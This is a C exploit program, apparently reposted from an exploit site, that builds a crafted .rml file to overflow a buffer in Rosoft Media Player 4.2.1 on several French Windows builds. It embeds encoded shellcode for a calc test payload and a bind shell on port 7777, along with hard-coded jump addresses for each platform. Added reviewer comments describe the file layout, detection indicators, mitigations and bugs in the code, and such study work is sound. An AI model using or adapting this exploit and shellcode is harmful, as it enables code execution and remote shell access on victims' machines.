Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
======================================================================
Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
======================================================================
/* rsmpf.c
 * Rosoft media player free local buffer overflow Exploit multi targets
 * Coded By :
 * SimO-s0fT (Maroc-anti-connexion@hotmail.com)
 * thanks To : Stack & fl0 fl0w & SKD
 * and special thanks to str0ke for his advices and support ( you are the best brotha )
 * example :
 * ##########################################################################################
 * # Coded By SimO-s0fT                                                                     #
 * # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP                                          #
 * # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP                                          #
 * # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP                                           #
 * # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP                                           #
 * # USAGE :                                                                                #
 * # exploit1.exe file.rml platform                                                         #
 * # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }                #
 * # failed...: No such file or directory                                                   #
 * # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0                      #
 * # [1] execute calc.exe                                                                   #
 * # [2] execute bindshell LPORT=7777                                                       #
 * # Choose a neumber : 2                                                                   #
 * # simo.rml has been created!                                                             #
 * # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777                #
 * # Console - Windows Trust 3.0 (Service Pack 3: v55                                       #
 * #                                                                                        #
 * # (C) 1985-2008 Microsoft Corp.                                                          #
 * #                                                                                        #
 * #                                                                                        #
 * # C:\Documents and Settings\The Fanopsis\Bureau>                                         #
 * ##########################################################################################
 * ********************************************************************************************************/

/*
 * Reviewer notes (defensive reading of this listing).
 *
 * What the program is: an offline file generator. It does not interact with
 * the media player; it only writes one file (argv[1], which the usage text
 * calls "file.rml"). Per the title, that file is presumably meant to
 * overflow a buffer when the player opens it; the vulnerable code path in
 * the player is not shown on this page.
 *
 * Layout of the generated file, as assembled in main():
 *   offset 0    : OFFSET (4096) bytes of 0x90 filler
 *   offset 4096 : bchars, 4 bytes (F0 FF FD 7F); purpose not documented here
 *   offset 4100 : NOP1, 4 bytes of 0x90
 *   offset 4104 : RET, 4 bytes taken from the selected systems[] entry,
 *                 stored in the byte order of the host that ran the tool
 *   offset 4108 : NOP2, 8 bytes of 0x90
 *   offset 4116 : scode1 or scode2, chosen from the interactive menu
 *
 * Detection: a .rml file that opens with several KiB of 0x90 is the most
 * stable indicator, together with one of the four systems[] values at
 * offset 4104. Do not key a signature on exact file size: the buffer is
 * written with fputs() without a terminating NUL (see main), so the tail of
 * the file is not determined by this source. For the second payload the
 * author's label implies a listener on TCP 7777 started from the player
 * process.
 *
 * Mitigation context: every return address is a fixed constant tied to one
 * OS build and language, which is why a per-platform table is needed. Fixed
 * addresses of this kind depend on predictable module load addresses and an
 * executable data region; address-space randomisation and non-executable
 * memory are the relevant platform mitigations, alongside removing or
 * updating the affected player.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Number of 0x90 filler bytes written before the control data (see main). */
#define OFFSET 4096

// calc (to test the exploit)
// NOTE(review): opaque encoded blob; the "calc" label is the author's and
// has not been verified from the bytes. main() measures it with strlen(),
// so only the bytes before the first NUL are used.
char scode1[]=
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
"\x21\xdb\x5b\x83\xeb\xfc\xe2\xf4\x55\xc9\x9f\x5b\xa9\x21\x50\x1e"
"\x95\xaa\xa7\x5e\xd1\x20\x34\xd0\xe6\x39\x50\x04\x89\x20\x30\x12"
"\x22\x15\x50\x5a\x47\x10\x1b\xc2\x05\xa5\x1b\x2f\xae\xe0\x11\x56"
"\xa8\xe3\x30\xaf\x92\x75\xff\x5f\xdc\xc4\x50\x04\x8d\x20\x30\x3d"
"\x22\x2d\x90\xd0\xf6\x3d\xda\xb0\x22\x3d\x50\x5a\x42\xa8\x87\x7f"
"\xad\xe2\xea\x9b\xcd\xaa\x9b\x6b\x2c\xe1\xa3\x57\x22\x61\xd7\xd0"
"\xd9\x3d\x76\xd0\xc1\x29\x30\x52\x22\xa1\x6b\x5b\xa9\x21\x50\x33"
"\x95\x7e\xea\xad\xc9\x77\x52\xa3\x2a\xe1\xa0\x0b\xc1\xd1\x51\x5f"
"\xf6\x49\x43\xa5\x23\x2f\x8c\xa4\x4e\x42\xba\x37\xca\x0f\xbe\x23"
"\xcc\x21\xdb\x5b";

//bind shell LPORT 7777
// NOTE(review): opaque encoded blob; behaviour and port are the author's
// claim (also repeated in the menu text in main) and are not verified here.
// Most bytes after the first ten fall in the printable ASCII range.
char scode2[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";

/*
 * Target table: a display label and one hard-coded 32-bit address per
 * platform, terminated by an entry whose platform pointer is NULL.
 * The labels end in "ESP"; presumably each value is the address of an
 * instruction that transfers control to the stack pointer, but the source
 * does not say which module it lives in. Confirm before relying on it.
 */
struct adresses {char *platform;
    unsigned long addr;
} systems[]= {
    {"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB },
    {"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 },
    {"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B },
    {"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D },
    {NULL },
};

/* Two short runs of 0x90 placed immediately before and after RET in the file. */
char NOP1[]="\x90\x90\x90\x90";// n0t working
char NOP2[]="\x90\x90\x90\x90\x90\x90\x90\x90";

/*
 * Build the crafted file.
 *
 * argv[1] is the output path, argv[2] the index into systems[]. The payload
 * (scode1 or scode2) is chosen interactively on stdin. Returns 0 on every
 * path that reaches the end of main; exits with status 0 if the output file
 * cannot be opened.
 */
int main(int argc,char *argv[]){
    FILE *s;
    unsigned char *buffer;
    /* NOTE(review): argv[2] is read here, before argc is examined, and the
     * atoi() result is used as an index without a bounds check against the
     * four entries of systems[]. */
    unsigned int RET= systems[atoi(argv[2])].addr;
    /* Four bytes written right after the filler; meaning not documented. */
    unsigned char bchars[]="\xF0\xFF\xFD\x7F";
    int i;
    int number;
    int offset=0;

    /* Usage banner. The test is argc < 2 although argv[2] is required, and
     * the branch does not return, so execution continues to fopen() below. */
    if (argc <2){
        system("cls");
        printf("Coded By SimO-s0fT\n");
        for(i=0;systems[i].platform;i++)
            printf("%d \t\t %s\n",i,systems[i].platform);
        printf("USAGE : \n\t");
        /* NOTE(review): argv[0] is passed as the format string itself. */
        printf(argv[0]);
        printf(".exe ");
        printf("file.rml ");
        printf("platform\n");
        printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }\n");
    }

    /* "wb" creates or truncates the output file; failure exits with 0. */
    if ((s=fopen(argv[1],"wb"))==NULL){
        perror("failed...");
        exit(0);
    }

    printf("[1] execute calc.exe\n");
    printf("[2] execute bindshell LPORT=7777\n");
    printf(" Choose a neumber : ");
    /* Return value is not checked; number stays uninitialised on bad input. */
    scanf("%d",&number);

    /* No default case: any other value leaves the (empty) file open and
     * falls through to return 0. */
    switch(number){
    case 1:
        /* Allocate exactly filler + bchars + NOP1 + RET + NOP2 + payload,
         * with no room for a terminating NUL; the result is not checked. */
        buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
        /* Pre-fill everything with 0x90; the first OFFSET bytes stay that way. */
        memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
        offset=OFFSET;
        memcpy(buffer+offset,bchars,strlen(bchars));
        offset+=strlen(bchars);
        memcpy(buffer+offset,NOP1,strlen(NOP1));
        offset+=strlen(NOP1);
        /* Raw 4 bytes of RET, in host byte order. */
        memcpy(buffer+offset,&RET,4);
        offset+=4;
        memcpy(buffer+offset,NOP2,strlen(NOP2));
        offset+=strlen(NOP2);
        memcpy(buffer+offset,scode1,strlen(scode1));
        offset+=strlen(scode1);
        /* NOTE(review): fputs() expects a NUL-terminated string, but the
         * buffer was sized without one, so the read runs past the
         * allocation and the trailing bytes of the file are unspecified. */
        fputs(buffer,s);
        fclose(s);
        printf("%s has been created!",argv[1]);
        free(buffer);
        break;
    case 2:
        /* Same construction as case 1, with scode2 as the payload. */
        buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
        memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
        offset=OFFSET;
        memcpy(buffer+offset,bchars,strlen(bchars));
        offset+=strlen(bchars);
        memcpy(buffer+offset,NOP1,strlen(NOP1));
        offset+=strlen(NOP1);
        memcpy(buffer+offset,&RET,4);
        offset+=4;
        memcpy(buffer+offset,NOP2,strlen(NOP2));
        offset+=strlen(NOP2);
        memcpy(buffer+offset,scode2,strlen(scode2));
        offset+=strlen(scode2);
        /* Same unterminated-buffer fputs() as in case 1. */
        fputs(buffer,s);
        fclose(s);
        printf("%s has been created!",argv[1]);
        free(buffer);
        break;
    }
    return 0;
}
# 0day.today [2024-12-25] #